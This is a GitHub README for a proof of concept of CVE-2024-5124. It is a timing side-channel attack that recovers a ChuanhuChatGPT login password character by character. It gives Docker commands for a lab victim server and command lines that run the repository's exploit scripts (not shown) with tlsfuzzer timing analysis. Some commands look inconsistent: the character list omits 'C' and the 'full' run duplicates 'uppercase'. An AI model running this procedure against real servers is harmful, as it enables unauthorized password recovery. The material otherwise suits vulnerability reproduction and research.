Skip to content

gogo2464/CVE-2024-5124

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
README.md
README.md
 
 
main.py
main.py
 
 
step2like.py
step2like.py
 
 

Repository files navigation

deploy victim server:

Install docker

# Install packages required for the installation

sudo apt-get update
sudo apt install --yes ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc

# Add the repository to Apt sources:

echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian \
  $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
# Download GPG key and store repository in the system

curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /usr/share/keyrings/docker.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable" |tee /etc/apt/sources.list.d/docker.list > /dev/null 
apt update 

# Install Docker packages

sudo apt install --yes docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

Run victim server

export JSON='{
    "users": [["openai", "isCloseAi"]]
}' ; sudo docker run -e language=en_US -it tuchuanhuhuhu/chuanhuchatgpt:20240310 /bin/bash -c "apt update && apt install --yes git && pip install itsdangerous gradio && echo '${JSON}' > config.json && sed -i 's/share=share/share=True/g' ChuanhuChatbot.py && python3 -u ChuanhuChatbot.py 2>&1 | tee /var/log/application.log"

deploy exploit:

I Install tlsfuzzer

sudo apt install --yes virtualenv
virtualenv -p python3 venv3
source venv3/bin/activate
pip install --pre tlslite-ng
git clone https://github.com/tlsfuzzer/tlsfuzzer

pip install requests argparse

II Run exploit

The argument --clock-frequency always must be set to 1000 like for example --clock-frequency 1000. No need to Guess your clock with: watch -n 1 "cat /proc/cpuinfo | grep 'MHz'" in python.

lowercase:

rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 1000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 1000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose

uppercase:

rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose

full:

rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose

Then the guessed character will be the one with the toppest (hightest) value in the file ./tmpdir/box_plot.png

You could also run the script on a cloud instance in this case, you could do :

export JSON='{
    "users": [["openai", "isCloseAi"]]
}' ;

export DOCKER_CMD="apt update && apt install --yes git && pip install itsdangerous gradio && echo '${JSON}' > config.json && sed -i 's/share=share/share=True/g' ChuanhuChatbot.py && python3 -u ChuanhuChatbot.py 2>&1 | tee /var/log/application.log"

export DOCKER_RUN='sudo docker run -e language=en_US -it tuchuanhuhuhu/chuanhuchatgpt:20240310 /bin/bash -c "${DOCKER_CMD}"'

tmux new-session -d -s persistent_server "${DOCKER_RUN}"
tmux attach -t persistent_server

# read the server url and edit the main.py to change the main.oy


tmux new-session -d -s persistent_session "rm -Rf tmpdir/ ; mkdir tmpdir/ ; python3 CVE-2024-5124/main.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z 'out.csv' && PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -o ./tmpdir/ && PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv && PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose"
tmux attach -t persistent_session

and reopen it at any moment with tmux attach -t persistent_session. It is ctr-b then d to detach it back.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages